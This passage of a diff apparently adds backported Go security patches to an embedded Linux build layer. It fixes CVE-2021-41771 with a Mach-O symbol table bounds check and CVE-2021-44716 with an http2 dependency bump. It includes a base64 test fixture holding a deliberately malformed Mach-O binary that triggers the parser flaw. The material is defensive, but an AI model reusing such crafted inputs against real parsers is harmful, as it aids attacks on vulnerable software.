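	fmt.Println(canPreallocate(100, 40, 2))      // true
}
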
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2021-41771.patch b/meta/recipes-devtools/go/go-1.14/CVE-2021-41771.patch
new file mode 100644
index 0000000000..526796dbcb
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2021-41771.patch
@@ -0,0 +1,86 @@
+From d19c5bdb24e093a2d5097b7623284eb02726cede Mon Sep 17 00:00:00 2001
+From: Roland Shoemaker <roland@golang.org>
+Date: Thu, 14 Oct 2021 13:02:01 -0700
+Subject: [PATCH] [release-branch.go1.16] debug/macho: fail on invalid dynamic
+ symbol table command
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Fail out when loading a file that contains a dynamic symbol table
+command that indicates a larger number of symbols than exist in the
+loaded symbol table.
+
+Thanks to Burak Çarıkçı - Yunus Yıldırım (CT-Zer0 Crypttech) for
+reporting this issue.
+
+Updates #48990
+Fixes #48991
+Fixes CVE-2021-41771
+
+Change-Id: Ic3d6e6529241afcc959544b326b21b663262bad5
+Reviewed-on: https://go-review.googlesource.com/c/go/+/355990
+Reviewed-by: Julie Qiu <julie@golang.org>
+Reviewed-by: Katie Hockman <katie@golang.org>
+Reviewed-by: Emmanuel Odeke <emmanuel@orijtech.com>
+Run-TryBot: Roland Shoemaker <roland@golang.org>
+TryBot-Result: Go Bot <gobot@golang.org>
+Trust: Katie Hockman <katie@golang.org>
+(cherry picked from commit 61536ec03063b4951163bd09609c86d82631fa27)
+Reviewed-on: https://go-review.googlesource.com/c/go/+/359454
+Reviewed-by: Dmitri Shuralyov <dmitshur@golang.org>
+
+https://github.com/golang/go/commit/d19c5bdb24e093a2d5097b7623284eb02726cede
+CVE: CVE-2021-41771
+Upstream-Status: Backport
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ src/debug/macho/file.go | 9 +++++++++
+ src/debug/macho/file_test.go | 7 +++++++
+ .../testdata/gcc-amd64-darwin-exec-with-bad-dysym.base64 | 1 +
+ 3 files changed, 17 insertions(+)
+ create mode 100644 src/debug/macho/testdata/gcc-amd64-darwin-exec-with-bad-dysym.base64
+
+diff --git a/src/debug/macho/file.go b/src/debug/macho/file.go
+index 085b0c8219bad..73cfce3c7606e 100644
+--- a/src/debug/macho/file.go
++++ b/src/debug/macho/file.go
+@@ -345,6 +345,15 @@ func NewFile(r io.ReaderAt) (*File, error) {
+ if err := binary.Read(b, bo, &hdr); err != nil {
+ return nil, err
+ }
++ if hdr.Iundefsym > uint32(len(f.Symtab.Syms)) {
++ return nil, &FormatError{offset, fmt.Sprintf(
++ "undefined symbols index in dynamic symbol table command is greater than symbol table length (%d > %d)",
++ hdr.Iundefsym, len(f.Symtab.Syms)), nil}
++ } else if hdr.Iundefsym+hdr.Nundefsym > uint32(len(f.Symtab.Syms)) {
++ return nil, &FormatError{offset, fmt.Sprintf(
++ "number of undefined symbols after index in dynamic symbol table command is greater than symbol table length (%d > %d)",
++ hdr.Iundefsym+hdr.Nundefsym, len(f.Symtab.Syms)), nil}
++ }
+ dat := make([]byte, hdr.Nindirectsyms*4)
+ if _, err := r.ReadAt(dat, int64(hdr.Indirectsymoff)); err != nil {
+ return nil, err
+diff --git a/src/debug/macho/file_test.go b/src/debug/macho/file_test.go
+index 03915c86e23d9..9beeb80dd27c1 100644
+--- a/src/debug/macho/file_test.go
++++ b/src/debug/macho/file_test.go
+@@ -416,3 +416,10 @@ func TestTypeString(t *testing.T) {
+ t.Errorf("got %v, want %v", TypeExec.GoString(), "macho.Exec")
+ }
+ }
++
++func TestOpenBadDysymCmd(t *testing.T) {
++ _, err := openObscured("testdata/gcc-amd64-darwin-exec-with-bad-dysym.base64")
++ if err == nil {
++ t.Fatal("openObscured did not fail when opening a file with an invalid dynamic symbol table command")
++ }
++}
+diff --git a/src/debug/macho/testdata/gcc-amd64-darwin-exec-with-bad-dysym.base64 b/src/debug/macho/testdata/gcc-amd64-darwin-exec-with-bad-dysym.base64
+new file mode 100644
+index 0000000000000..8e0436639c109
+--- /dev/null
++++ b/src/debug/macho/testdata/gcc-amd64-darwin-exec-with-bad-dysym.base64
+@@ -0,0 +1 @@
++z/rt/gcAAAEDAACAAgAAAAsAAABoBQAAhQAAAAAAAAAZAAAASAAAAF9fUEFHRVpFUk8AAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAZAAAA2AEAAF9fVEVYVAAAAAAAAAAAAAAAAAAAAQAAAAAQAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAcAAAAFAAAABQAAAAAAAABfX3RleHQAAAAAAAAAAAAAX19URVhUAAAAAAAAAAAAABQPAAABAAAAbQAAAAAAAAAUDwAAAgAAAAAAAAAAAAAAAAQAgAAAAAAAAAAAAAAAAF9fc3ltYm9sX3N0dWIxAABfX1RFWFQAAAAAAAAAAAAAgQ8AAAEAAAAMAAAAAAAAAIEPAAAAAAAAAAAAAAAAAAAIBACAAAAAAAYAAAAAAAAAX19zdHViX2hlbHBlcgAAAF9fVEVYVAAAAAAAAAAAAACQDwAAAQAAABgAAAAAAAAAkA8AAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABfX2NzdHJpbmcAAAAAAAAAX19URVhUAAAAAAAAAAAAAKgPAAABAAAADQAAAAAAAACoDwAAAAAAAAAAAAAAAAAAAgAAAAAAAAAAAAAAAAAAAF9fZWhfZnJhbWUAAAAAAABfX1RFWFQAAAAAAAAAAAAAuA8AAAEAAABIAAAAAAAAALgPAAADAAAAAAAAAAAAAAALAABgAAAAAAAAAAAAAAAAGQAAADgBAABfX0RBVEEAAAAAAAAAAAAAABAAAAEAAAAAEAAAAAAAAAAQAAAAAAAAABAAAAAAAAAHAAAAAwAAAAMAAAAAAAAAX19kYXRhAAAAAAAAAAAAAF9fREFUQQAAAAAAAAAAAAAAEAAAAQAAABwAAAAAAAAAABAAAAMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABfX2R5bGQAAAAAAAAAAAAAX19EQVRBAAAAAAAAAAAAACAQAAABAAAAOAAAAAAAAAAgEAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAF9fbGFfc3ltYm9sX3B0cgBfX0RBVEEAAAAAAAAAAAAAWBAAAAEAAAAQAAAAAAAAAFgQAAACAAAAAAAAAAAAAAAHAAAAAgAAAAAAAAAAAAAAGQAAAEgAAABfX0xJTktFRElUAAAAAAAAACAAAAEAAAAAEAAAAAAAAAAgAAAAAAAAQAEAAAAAAAAHAAAAAQAAAAAAAAAAAAAAAgAAABgAAAAAIAAACwAAAMAgAACAAAAACwAAAFAAAAAAAAAAAgAAAAIAAAAHAAAACQAAAP8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACwIAAABAAAAAAAAAAAAAAAAAAAAAAAAAAOAAAAIAAAAAwAAAAvdXNyL2xpYi9keWxkAAAAAAAAABsAAAAYAAAAOyS4cg5FdtQoqu6JsMEhXQUAAAC4AAAABAAAACoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQPAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMAAAAOAAAABgAAAACAAAAAAABAAAAAQAvdXNyL2xpYi9saWJnY2Nfcy4xLmR5bGliAAAAAAAAAAwAAAA4AAAAGAAAAAIAAAAEAW8AAAABAC91c3IvbGliL2xpYlN5c3RlbS5CLmR5bGliAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABqAEiJ5UiD5PBIi30ISI11EIn6g8IBweIDSAHySInR6wRIg8EISIM5AHX2SIPBCOgiAAAAicfoMgAAAPRBU0yNHafw//9BU/8lvwAAAA8fAP8lvgAAAFVIieVIjT0zAAAA6A0AAAC4AAAAAMnD/yXRAAAA/yXTAAAAAAAATI0dwQAAAOm0////TI0dvQAAAOmo////aGVsbG8sIHdvcmxkAAAAABQAAAAAAAAAAXpSAAF4EAEQDAcIkAEAACwAAAAcAAAAkv////////8XAAAAAAAAAAAEAQAAAA4QhgIEAwAAAA0GAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABDAX/9/AAAIEMBf/38AAAAAAAABAAAAGBAAAAEAAAAQEAAAAQAAAAgQAAABAAAAABAAAAEAAACQDwAAAQAAAJwPAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAHgEAAFAPAAABAAAAGwAAAB4BAABkDwAAAQAAAC4AAAAPBgAAGBAAAAEAAAA2AAAADwYAABAQAAABAAAAPgAAAA8GAAAAEAAAAQAAAEoAAAADABAAAAAAAAEAAABeAAAADwYAAAgQAAABAAAAZwAAAA8BAABqDwAAAQAAAG0AAAAPAQAAFA8AAAEAAABzAAAAAQABAgAAAAAAAAAAeQAAAAEAAQIAAAAAAAAAAAkAAAAKAAAACQAAAAoAAAAgAGR5bGRfc3R1Yl9iaW5kaW5nX2hlbHBlcgBfX2R5bGRfZnVuY19sb29rdXAAX05YQXJnYwBfTlhBcmd2AF9fX3Byb2duYW1lAF9fbWhfZXhlY3V0ZV9oZWFkZXIAX2Vudmlyb24AX21haW4Ac3RhcnQAX2V4aXQAX3B1dHMAAA==
+\ No newline at end of file
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2021-44716.patch b/meta/recipes-devtools/go/go-1.14/CVE-2021-44716.patch
new file mode 100644
index 0000000000..9c4fee2db4
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2021-44716.patch
@@ -0,0 +1,93 @@
+From 9f1860075990e7bf908ca7cc329d1d3ef91741c8 Mon Sep 17 00:00:00 2001
+From: Filippo Valsorda <filippo@golang.org>
+Date: Thu, 9 Dec 2021 06:13:31 -0500
+Subject: [PATCH] net/http: update bundled golang.org/x/net/http2
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/d0aebe3e74fe14799f97ddd3f01129697c6a290a]
+CVE: CVE-2021-44716
+Signed-off-by: Ralph Siemsen <ralph.siemsen@linaro.org>
+
+
+Pull in security fix
+
+ a5309b3 http2: cap the size of the server's canonical header cache
+
+Updates #50058
+Fixes CVE-2021-44716
+
+Change-Id: Ifdd13f97fce168de5fb4b2e74ef2060d059800b9
+Reviewed-on: https://go-review.googlesource.com/c/go/+/370575
+Trust: Filippo Valsorda <filippo@golang.org>
+Run-TryBot: Filippo Valsorda <filippo@golang.org>
+Reviewed-by: Alex Rakoczy <alex@golang.org>
+TryBot-Result: Gopher Robot <gobot@golang.org>
+(cherry picked from commit d0aebe3e74fe14799f97ddd3f01129697c6a290a)
+---
+ src/go.mod | 2 +-
+ src/go.sum | 4 ++--
+ src/net/http/h2_bundle.go | 10 +++++++++-
+ src/vendor/modules.txt | 2 +-
+ 4 files changed, 13 insertions(+), 5 deletions(-)
+
+diff --git a/src/go.mod b/src/go.mod
+index ec6bd98..56f2fbb 100644
+--- a/src/go.mod
++++ b/src/go.mod
+@@ -4,7 +4,7 @@ go 1.14
+
+ require (
+ golang.org/x/crypto v0.0.0-20200128174031-69ecbb4d6d5d
+- golang.org/x/net v0.0.0-20210129194117-4acb7895a057
++ golang.org/x/net v0.0.0-20211209100217-a5309b321dca
+ golang.org/x/sys v0.0.0-20200201011859-915c9c3d4ccf // indirect
+ golang.org/x/text v0.3.3-0.20191031172631-4b67af870c6f // indirect
+ )
+diff --git a/src/go.sum b/src/go.sum
+index 171e083..1ceba05 100644
+--- a/src/go.sum
++++ b/src/go.sum
+@@ -2,8 +2,8 @@ golang.org/x/crypto v0.0.0-20190308221718-c2843e01d9a2/go.mod h1:djNgcEr1/C05ACk
+ golang.org/x/crypto v0.0.0-20200128174031-69ecbb4d6d5d h1:9FCpayM9Egr1baVnV1SX0H87m+XB0B8S0hAMi99X/3U=
+ golang.org/x/crypto v0.0.0-20200128174031-69ecbb4d6d5d/go.mod h1:LzIPMQfyMNhhGPhUkYOs5KpL4U8rLKemX1yGLhDgUto=
+ golang.org/x/net v0.0.0-20190404232315-eb5bcb51f2a3/go.mod h1:t9HGtf8HONx5eT2rtn7q6eTqICYqUVnKs3thJo3Qplg=
+-golang.org/x/net v0.0.0-20210129194117-4acb7895a057 h1:HThQeV5c0Ab/Puir+q6mC97b7+3dfZdsLWMLoBrzo68=
+-golang.org/x/net v0.0.0-20210129194117-4acb7895a057/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s=
